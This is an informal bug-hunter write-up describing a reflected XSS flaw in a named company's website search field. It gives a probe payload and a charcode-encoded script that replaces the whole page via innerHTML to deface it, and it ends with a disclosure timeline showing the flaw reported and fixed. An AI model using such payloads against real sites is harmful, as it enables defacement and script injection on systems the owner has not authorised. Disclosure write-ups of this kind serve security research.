XSS WITH HTML AND HOW TO CONVERT THE HTML INTO CHARCODE()

Hello, Back Again With Me

This time i want to try to do some inject XSS with HTML full page script. It can be called with “injecting xss then it will shows your HTML Page”

As usual, i do some check with this command input :

<script>alert(‘test’)</script>

If vuln, i try something different

My Target :

https://www.puninar.com/

2nd Open this Page :

Third, i try to convert my deface HTML web lol

do COPY all of my HTML script.

Then open uncle jim’s page

Paste into that part (zoom if you can’t see) :

sebelah kiri charcodeat()

Then click the charcodeat() button

sebelah kanan charcodeat()

After got the char result, i do Copy the charcode on my notepad

Then i do add some script :

<script>document.documentElement.innerHTML=(String.fromCharCode(*paste here your charcode*));<script>

It will looks this


<script> document.documentElement.innerHTML=(String.fromCharCode(60, 104, 116, 109, 108, 62, 32, 10, 60, 104, 101, 97, 100, 62, 32, 10, 60, 115, 99, 114, 105, 112, 116, 62, 32, 118, 97, 114, 32, 109, 101, 115, 115, 97, 103, 101, 61, 34, 84, 73, 77, 73, 84, 83, 69, 67, 45, 78, 88, 71, 71, 34, 59, 10, 47, 47, dst));</script>


Then back to your target page, paste into search column then do ENTER

TADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA …..

injecting XSS full page

That;s it

Thank you

timeline

  • 20/10/2018 (Submit Report)
  • 21/10/2018 (Mitigation Bug)
  • 22/10/2018 (Say Thank you only no reward Shit & Bug Closed)